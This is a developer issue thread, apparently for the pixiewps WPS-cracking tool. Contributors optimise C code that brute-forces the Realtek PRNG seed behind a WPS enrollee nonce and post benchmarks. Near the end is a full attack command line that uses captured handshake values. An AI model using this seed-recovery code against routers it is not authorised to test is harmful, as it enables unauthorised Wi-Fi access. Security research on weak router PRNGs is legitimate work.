Perfomance improvement for the realtek.
1yura opened this issue · 18 comments
I found the way to improvement perfomance of the realtek prng.
static const uint32_t realtek_fast_table[3 + 31] = {0x128e83b, 0xdafa31, 0x9f4828, 0xf66443, 0xbee24d, 0x817005, 0xcb918f, 0xa64845, 0x69c3cf, 0xa76dbd, 0x90a848, 0x57025f, 0x89126c, 0x7d9a8f, 0x48252a, 0x6fb2d4, 0x6ccc15, 0x3c5744, 0x5a998f, 0x5df917, 0x32ed77, 0x492688, 0x50e901, 0x2b5f57, 0x3acd0b, 0x456b7a, 0x25413d, 0x2f11f4, 0x3b564d, 0x203f14, 0x2589fc, 0x3283f8, 0x1c17e4, 0x1dd823};
static inline void realtek_fast_produce_nonce(uint32_t seed, uint8_t *dest){ // convert seed to nonce, it is completly replaces srandom_r() and random_r() ; seed !=0
uint32_t word0 = 0, word1 = 0, word2 = 0, word3 = 0;
for (int j = 0; j < 31; j++) {
word0 += seed * realtek_fast_table[j + 3];
word1 += seed * realtek_fast_table[j + 2];
word2 += seed * realtek_fast_table[j + 1];
word3 += seed * realtek_fast_table[j + 0];
seed = (uint32_t) (((uint64_t)16807 * seed) % 2147483647);
}
word0 = htonl(word0 >> 1); memcpy(dest + 0, &word0, 4);
word0 = htonl(word1 >> 1); memcpy(dest + 4, &word0, 4);
word0 = htonl(word2 >> 1); memcpy(dest + 8, &word0, 4);
word0 = htonl(word3 >> 1); memcpy(dest + 12, &word0, 4);
}
static uint32_t realtek_fast_prepare_sample(uint8_t *nonce) { // get 1/4 part of the nonce for testing
uint32_t res;
memcpy(&res, nonce, sizeof(res));
return ntohl(res);
}
static inline int realtek_fast_test_seed(uint32_t seed, uint32_t sample){ // testing 1/4 part of the nonce; if matched - there is a need to test a whole nonce; seed !=0
uint32_t word0 = 0;
for (int j = 0; j < 31; j++) {
word0 += seed * realtek_fast_table[j + 3];
seed = (uint32_t) (((uint64_t)16807 * seed) % 2147483647);
}
word0 = word0 >> 1;
return sample == word0 ? ret_ok : ret_fail;
}
and the example - how to use these functions:
uint32_t sample = realtek_fast_prepare_sample(wps->e_nonce);
int seed_found = 0;
for (uint32_t seed = 1; seed < 0xffffffff; seed++) {
if (realtek_fast_test_seed(seed, sample) != ret_ok) {
continue;
}
uint8_t test_nonce[WPS_NONCE_LEN];
realtek_fast_produce_nonce(seed, test_nonce);
if(memcmp(wps->e_nonce, test_nonce, WPS_NONCE_LEN) == 0) {
seed_found = 1;
break;
}
}
It works 5 more times faster than the chain srandom_r() + random_r(). I do not tested it on big endian CPU.
Edit: added syntax coloring (wiire-a)
Thank you again for your contribution. I will test as soon as I have some spare time :)
The modulo operator is quite slow:
seed = (uint32_t) (((uint64_t)16807 * seed) % 2147483647);
can be substituted with this (should be ~30% faster):
const uint64_t p = 16807ULL * seed;
const uint64_t m = (p >> 31) + (p & 0x7fffffff);
seed = (uint32_t)((m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m);
I did not noticed then you replaced srandom_r ()
:)
Added the new code with (7738fda).
I simplified the code a bit, like removing the htonl()
functions and the % 2147483647
parts.
On my x86 machine it's about 60% faster, but my commit aimed for a quick and simple integration with the existing code. Some further testing and tweaking could be useful.
In the cycle
for (int j = 0; j < 31; j++)
last (when j == 30) calculation of seed is useless.
Yes. I think the code could be re-written this way:
static inline uint32_t glibc_fast_seed(uint32_t seed)
{
uint32_t word0 = 0;
for (int j = 3; j < 31 + 3 - 1; j++) {
word0 += seed * glibc_seed_tbl[j];
/* This does: seed = (16807LL * seed) % 0x7fffffff
using the sum of digits method which works for mod N, base N+1 */
const uint64_t p = 16807ULL * seed; // Seed is always positive (31 bits)
seed = (p >> 31) + (p & 0x7fffffff);
}
return (word0 + seed * glibc_seed_tbl[33]) >> 1;
}
The variable seed is always positive thus the multiplication 16807ULL * seed
is 63 bits or less and after the first shift (p >> 31)
the top bits of p
are always 0
. So the second part:
/* The result might still not fit in 31 bits, if not, repeat
(conditional seems to make it slightly faster) */
seed = (m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m;
is useless.
Maybe you can confirm me that.
BTW if you want come back to the IRC channel we can discuss these things there. I know that @rofl0r can be a bit annoying but bear with him ;)
Pushed the new changes (7acd739). On my laptop now the difference is much more noticeable compared to my old code: 4 times faster.
seed = (m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m;
is useless.
Maybe you can confirm me that.
Not confirm. For example with seed 5951 glibc_fast_seed() gets wrong result. I don know why. With
seed = (m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m; - all ok.
A constantly working messenger distracts me. But when there is something to discuss - I will join.
And about - can ralink_random() produce any value or not - it can, i checked :)
I found something interesting:
seed = 0xfffffffe
function with code
seed = (uint32_t) (((uint64_t)16807 * seed) % 2147483647);
produces correct nonce. But function with
const uint64_t p = 16807ULL * seed;
const uint64_t m = (p >> 31) + (p & 0x7fffffff);
seed = (uint32_t)((m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m);
produces wrong nonce.
Upd.
Try this fast function: https://0x0.st/sNXM.c
The output must be compared with the lower 7 bits of the first word(32 bit) nonce.
Will do soon.
At the time I added the conditional because it seemed to be faster that way. In this function however it seems to make it noticeably slower so I guess we should replace:
const uint64_t p = 16807ULL * seed;
const uint64_t m = (p >> 31) + (p & 0x7fffffff);
seed = (m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m;
with this:
uint64_t p = 16807ULL * seed;
p = (p >> 31) + (p & 0x7fffffff);
seed = (p >> 31) + (p & 0x7fffffff);
In the current code negative values are never tested since the seed corresponds always to the current time, it's always positive. So I wouldn't add the check with:
seed = (seed == 0x7fffffff || seed == 0xfffffffe) ? 0 : seed;
which only slows down the cracking process.
If the current time is not retrieved from the router, the value of 0 (Unix Epoch) is returned. But seed = 0 returns a value of 0. So internally the PRNG checks if seed = 0, if it is it changes it to 1, see glibc_random_old.c#L93:
/* We must make sure the seed is not 0. Take arbitrarily 1 in this case. */
if (seed == 0)
seed = 1;
The value of 0x7ffffffff
would be ok, but it represents 03:14:07 of January 19th 2038 (UTC)
. In practice it's never tested unless the user uses --end/start 02/2038
. But honestly I wouldn't worry about it.
What's the purpose of doing:
REALTEK_FAST_SEED_STEP
over and over again, if the seed doesn't change?
It updates the seed :)
# define REALTEK_FAST_SEED_STEP p = 16807ULL * seed; m = (p >> 31) + (p & 0x7fffffff); seed = (uint32_t)((m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m);
Old:
2242.215146 task-clock (msec) # 3.727 CPUs utilized
217 context-switches # 0.097 K/sec
3 cpu-migrations # 0.001 K/sec
140 page-faults # 0.062 K/sec
5,116,201,317 cycles # 2.282 GHz (83.45%)
64,305,319 stalled-cycles-frontend # 1.26% frontend cycles idle (83.54%)
2,728,813,181 stalled-cycles-backend # 53.34% backend cycles idle (33.12%)
8,297,312,960 instructions # 1.62 insn per cycle
# 0.33 stalled cycles per insn (50.20%)
556,638,317 branches # 248.254 M/sec (66.95%)
4,441,275 branch-misses # 0.80% of all branches (83.47%)
0.601541662 seconds time elapsed
New:
2267.696976 task-clock (msec) # 3.741 CPUs utilized
227 context-switches # 0.100 K/sec
2 cpu-migrations # 0.001 K/sec
141 page-faults # 0.062 K/sec
5,179,056,557 cycles # 2.284 GHz (83.62%)
17,023,000 stalled-cycles-frontend # 0.33% frontend cycles idle (83.18%)
3,291,806,179 stalled-cycles-backend # 63.56% backend cycles idle (33.36%)
6,936,919,663 instructions # 1.34 insn per cycle
# 0.47 stalled cycles per insn (51.10%)
80,430,879 branches # 35.468 M/sec (67.60%)
320,102 branch-misses # 0.40% of all branches (83.81%)
0.606194954 seconds time elapsed
It doesn't really change anything for me. Even if you unroll or remove the for loop, the instructions are still executed sequentially since one depends on the other.
For example:
REALTEK_FAST_SEED_STEP
b += realtek_fast_lookup_4d[(uint8_t)seed]; /* This must wait operation above to finish (since seed is shared) */
REALTEK_FAST_SEED_STEP /* This must wait operation above to finish (since seed is shared) */
b += realtek_fast_lookup_5[(uint8_t)seed]; /* This must wait operation above to finish (since seed is shared) */
If instead we'd have something like:
for (...) {
// ...
independent_operation_A();
independent_operation_B();
// ...
}
those 2 would execute in parallel if they wouldn't share the same variables (seed
in our case).
Also the most expensive operation is the modulo (%) or its variant in REALTEK_FAST_SEED_STEP
, a precomputed table maybe should aim at avoiding or reducing that.
I pushed the changes to fix my previous commit so we have the same starting point to judge optimizations and modifications.
Maybe another consideration that could be useful is the fact that we test the seeds in sequence:
seed
seed + 1
seed + 2
...
or, backwards
seed
seed - 1
seed - 2
...
Not sure if this helps, but if it would we could setup some intermediate table(s), eg: initstate_table(seed)
.
I'm just throwing out ideas. I'm still not sure I understand what you did with your changes :)
I have no more ideas.
It should be noted that the conversion of nonce -> seed is always fixed, therefore, those who are important speed can use the lookup tables. The full table is 16GB, the optimized one is 8GB. Or rainbow tables.
We've come a log way. A simple benchmark over a 3 years period (--start 2017 --end 2014
) on my laptop:
version | -j 1 | -j 4 | PRNG |
---|---|---|---|
1.3.0 | 108 s 362 ms | - | old |
pre-1.4.0 | 76 s 534 ms | 29 s 818 ms | old optimized |
1.4.1 | 27 s 105 ms | 9 s 221 ms | lazy |
git | 8 s 909 ms | 3 s 109 ms | yura |
Obviously the difference is less noticeable on a faster machine (e.g. my Desktop).
There will be a new release soon. Thank you :)
Data used:
./pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r 89:90:3d:aa:c7:52:5a:3e:33:c5:b8:33:a3:1d:bf:a5:3c:95:d4:d4:6f:4c:1b:f5:3f:9b:e8:77:47:d8:72:7b:a9:46:85:f6:83:4b:6a:11:d0:6d:1d:5b:5f:af:70:32:02:4e:f9:d7:5c:bb:45:d8:03:eb:b2:ea:5d:c7:b2:a8:05:9d:f3:7e:93:be:97:c4:d6:60:11:cc:fc:9a:d3:21:f3:b9:4b:5b:79:ae:5d:31:66:3d:7c:41:42:31:df:5a:62:64:70:97:ae:7a:7a:57:43:13:71:01:cc:80:df:c0:7d:45:2e:e6:5d:92:8f:22:28:6c:53:f6:4f:5e:f8:aa:bf:21:4b:c6:9e:37:74:86:37:f2:07:6b:26:b9:7a:6f:50:86:6e:2a:80:3a:5a:e4:0f:d3:9e:50:12:4e:86:38:05:38:c6:34:1a:b7:8a:8a:13:f9:19:f9:61:c0:75:b7:2c:9a:1d:21:d5:5c:14:e7:50:94:c8:53:a8:4d:0f:06 -s d1:61:6f:47:df:93:d1:94:80:ec:a1:23:3c:7b:0b:1e:7a:b7:c4:09:a8:b8:20:87:cb:26:89:d4:d5:34:e3:21 -z 11:58:69:bd:7c:9d:3a:8c:18:e9:b1:04:bc:2e:85:a2:39:fb:12:cd:b3:a0:a5:c5:95:88:08:1d:fb:d7:92:a7 -a 77:e6:24:e3:4f:d1:8e:57:48:a2:88:de:ee:88:0e:14:bc:8e:9e:c8:4b:eb:14:ec:9e:8b:cb:d5:d6:6d:79:97 -n 4b:86:6f:2e:76:49:21:ce:56:c2:93:63:3c:b5:a0:b5